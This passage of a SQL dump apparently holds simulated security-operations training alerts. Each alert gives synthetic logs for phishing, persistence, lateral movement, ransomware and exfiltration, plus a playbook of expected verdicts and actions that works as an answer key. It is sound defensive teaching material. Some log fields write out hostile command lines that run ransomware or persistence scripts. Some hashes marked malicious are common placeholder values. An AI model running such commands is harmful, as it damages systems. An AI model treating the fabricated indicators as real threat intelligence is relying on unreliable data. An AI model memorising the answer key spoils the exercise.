attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in data exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (403, 'Suspicious Email Attachment Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected targeting key personnel at the think tank. The email contained a document with malicious macros aiming to gain initial access to the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"email_subject\":\"Urgent: Update Required\",\"sender_email\":\"attackers@maliciousdomain.com\",\"recipient_email\":\"john.doe@thinktank.org\",\"attachment_name\":\"UpdateInstructions.docm\",\"attachment_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"malware_family\":\"Emotet\",\"user\":\"jdoe\"}', '2026-01-04 02:18:47', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Emotet campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attackers@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email domain associated with phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"UpdateInstructions.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"File contains macros linked to Emotet malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Emotet payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (404, 'Malicious Browser Extension Installed', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the attachment, a script executes silently in the background, installing a malicious browser extension designed to intercept email credentials.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"4624\",\"computer_name\":\"user-pc.example.com\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.5\",\"malicious_file\":\"browser_harvest_ext.crx\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"script_name\":\"install_extension.js\",\"process_id\":4321,\"action\":\"extension_installed\",\"extension_id\":\"abcdef123456\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-01-04 02:18:47', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareHashDB\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malicious browser extensions.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"browser_harvest_ext.crx\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalEDR\",\"verdict\":\"suspicious\",\"details\":\"Detected as part of an unauthorized installation process.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (405, 'BabyShark VBS Script Execution', 'medium', 'System Event Logs', 'The BabyShark VBS script was executed to establish persistence on the compromised system. This script runs at startup, allowing attackers to maintain access over time.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"event_id\":\"7045\",\"timestamp\":\"2023-10-12T14:22:35Z\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"action\":\"Service Installed\",\"service_name\":\"BabySharkVBS\",\"service_filename\":\"C:\\\\Windows\\\\System32\\\\BabyShark.vbs\",\"command_line\":\"wscript.exe C:\\\\Windows\\\\System32\\\\BabyShark.vbs\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"associated_user\":\"compromised_user\"}', '2026-01-04 02:18:47', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP Blacklist\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash matches known BabyShark VBS script.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account compromised as part of the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (406, 'Unauthorized Access to Internal Network', 'high', 'Network Traffic Analysis', 'An attacker was detected moving laterally within the internal network by exploiting compromised credentials. The attacker was observed accessing multiple internal systems, suggesting an attempt to identify sensitive data and further vulnerabilities.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"user\":\"jdoe\",\"action\":\"login_success\",\"protocol\":\"SMB\",\"file_accessed\":\"sensitive_data.xlsx\",\"hash\":\"3d2e4f8c5b9a4f4d9a7b0c9f1e2b3c4d\",\"event_id\":\"4624\",\"message\":\"User jdoe successfully logged in from 203.0.113.45 to 10.0.0.5 via SMB.\"}', '2026-01-04 02:18:47', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligenceDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalUserDatabase\",\"verdict\":\"internal\",\"details\":\"Compromised internal user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e4f8c5b9a4f4d9a7b0c9f1e2b3c4d\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL), (407, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The Kimsuky APT group has successfully exfiltrated sensitive emails and documents related to nuclear policy. They utilized a compromised browser extension to send data back to their command and control servers.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:52:23Z\",\"event_id\":\"EXFIL-2023-1001\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"johndoe\",\"exfiltrated_files\":[\"nuclear_policy_draft.docx\",\"email_correspondence_2023.eml\"],\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_extension_id\":\"kimsuky_extension_123\",\"c2_server\":\"malicious.kimsuky.org\"}', '2026-01-04 02:18:47', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known Kimsuky C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Kimsuky malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nuclear_policy_draft.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Affected user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (408, 'Initial Access via Supply Chain Compromise', 'high', 'Network Intrusion Detection System', 'APT41 has initiated an operation by exploiting a vulnerability in a third-party software update, gaining initial access to the targeted gaming company\'s network.', 'Supply Chain Attack', 'T1195.002 - Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:32Z\",\"event_id\":\"EVT-2023-20145\",\"source_ip\":\"198.51.100.14\",\"destination_ip\":\"10.0.5.25\",\"filename\":\"CCleaner_Update_v5.7.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_name\":\"Suspicious Software Update\",\"user\":\"update_service\",\"description\":\"Detected a potentially malicious software update from a third-party provider.\"}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT41 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"CCleaner_Update_v5.7.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File associated with supply chain attacks targeting software updates.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware variant used by APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (409, 'Execution of Backdoor Malware', 'high', 'Endpoint Detection and Response', 'After gaining initial access, APT41 executes a custom backdoor, allowing them to control compromised systems remotely. The malware deployment was detected via an anomaly in the execution patterns on a critical server.', 'Malware Deployment', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:01Z\",\"event_id\":\"EVT-2023-1023\",\"source_ip\":\"203.0.113.44\",\"destination_ip\":\"192.168.1.10\",\"user\":\"admin\",\"process_name\":\"svchost.exe\",\"malware_name\":\"APT41_Custom_Backdoor\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"backdoor.dll\",\"severity\":\"High\",\"action_taken\":\"Quarantine\"}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT41 campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Critical server within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as known APT41 malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"malicious\",\"details\":\"Suspicious DLL associated with backdoor activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (410, 'Establishing Persistence with Rootkit', 'high', 'Host-based Intrusion Prevention System', 'APT41 has installed a rootkit on a key server to ensure long-term access and resist detection. This activity is part of their advanced tactics to maintain persistent access within the network.', 'Persistence Mechanism', 'T1014 - Rootkit', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:46:23Z\",\"event_id\":\"HIPS-2023-5567\",\"host_ip\":\"192.168.1.10\",\"detected_action\":\"Rootkit Installation\",\"malware_name\":\"APT41_Rootkit\",\"file_path\":\"/usr/local/bin/apt41_rootkit\",\"file_hash\":\"3a5f1d7b8ee1b9c3c0a8a9c512345678\",\"attacker_ip\":\"203.0.113.45\",\"detected_by\":\"HIPS\",\"username\":\"sysadmin\",\"additional_info\":{\"rootkit_persistence\":true,\"kernel_modification\":true}}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Confirmed malicious IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f1d7b8ee1b9c3c0a8a9c512345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known APT41 rootkit sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/usr/local/bin/apt41_rootkit\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Filename associated with APT41 rootkit persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"sysadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account with elevated privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (411, 'Lateral Movement to PII Databases', 'critical', 'Security Information and Event Management', 'APT41 has successfully utilized harvested credentials to move laterally within the network, specifically targeting databases containing PII.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:47Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"compromised_user\",\"action\":\"lateral_movement\",\"tool\":\"Mimikatz\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"mimilib.dll\",\"event_description\":\"Failed login attempt detected on database server with potential credential dumping activity.\",\"additional_info\":{\"failed_logins\":5,\"successful_logins\":1,\"target_database\":\"PII_DB_01\"}}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal database server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory Logs\",\"verdict\":\"suspicious\",\"details\":\"Account recently accessed from multiple foreign IPs.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"mimilib.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used by Mimikatz for credential dumping.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL), (412, 'Exfiltration of Game Source Code and PII', 'critical', 'Data Loss Prevention', 'APT41 successfully exfiltrated sensitive game source code and PII. This marks the completion of their dual-mode operation focused on both commercial and strategic gains.', 'Data Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"event_id\":\"EXFIL-2023-5276\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.15\",\"action\":\"ALLOW\",\"protocol\":\"HTTPS\",\"file_name\":\"game_source_code_v1.0.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"url\":\"https://malicious-domain.com/upload\",\"data_volume\":\"15GB\",\"comments\":\"Data exfiltration detected via secured channel; source code and PII files identified.\"}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Malicious file associated with APT41 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-domain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"URL associated with data exfiltration activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"game_source_code_v1.0.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Exfiltrated file containing sensitive game source code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL), (413, 'Supply Chain Compromise Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Anomalous network activity detected indicating a potential supply chain compromise. The malicious code was inserted into a popular software update by APT41, exploiting the company\'s reliance on the software to gain a foothold in the network.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"update_v1.23.4.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"alert_id\":\"NIDS-20231015-0001\"}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious software update used in supply chain attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update_v1.23.4.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Filename associated with malicious software update distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (414, 'Suspicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'After gaining access, the attackers deployed a suspicious script to execute a ransomware payload, aiming to encrypt critical business data and demand a ransom. The script was detected running on a critical server.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"edr-20231015-0001\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"script_name\":\"encryptor_v2.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"process_id\":4521,\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\j.doe\\\\Desktop\\\\encryptor_v2.ps1\",\"detected_by\":\"EDR\",\"external_ip\":\"203.0.113.45\",\"malware_family\":\"APT41\"}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encryptor_v2.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Database\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized script executed on high-value server\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (415, 'Persistence Mechanism Activated', 'high', 'SIEM', 'The attackers have implemented persistence mechanisms, such as scheduled tasks and registry modifications, to ensure they can regain access even if initial efforts are disrupted. A suspicious scheduled task and registry key modification were detected on the host machine. This activity aligns with known APT41 tactics.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"scheduled_task\":\"UpdateCheck\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"Updater.exe\",\"action\":\"Task Created\",\"description\":\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\",\"os\":\"Windows 10\"}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious executable used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Updater.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"Executable linked to persistence mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in previous suspicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (416, 'Lateral Movement Detected', 'high', 'User and Entity Behavior Analytics (UEBA)', 'APT41 is utilizing stolen credentials to move laterally across the network, targeting sensitive systems. This activity is characteristic of espionage operations and poses a significant threat to the organization\'s critical infrastructure.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.15\",\"username\":\"jdoe_admin\",\"event_type\":\"lateral_movement\",\"event_description\":\"Suspicious lateral movement detected using stolen credentials\",\"malware_hash\":\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\",\"filename\":\"APT41_Tool.exe\",\"observed_activity\":[{\"action\":\"login_attempt\",\"result\":\"success\",\"target_system\":\"10.0.5.15\"},{\"action\":\"file_access\",\"result\":\"success\",\"file\":\"Sensitive_Data.xlsx\"}]}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', 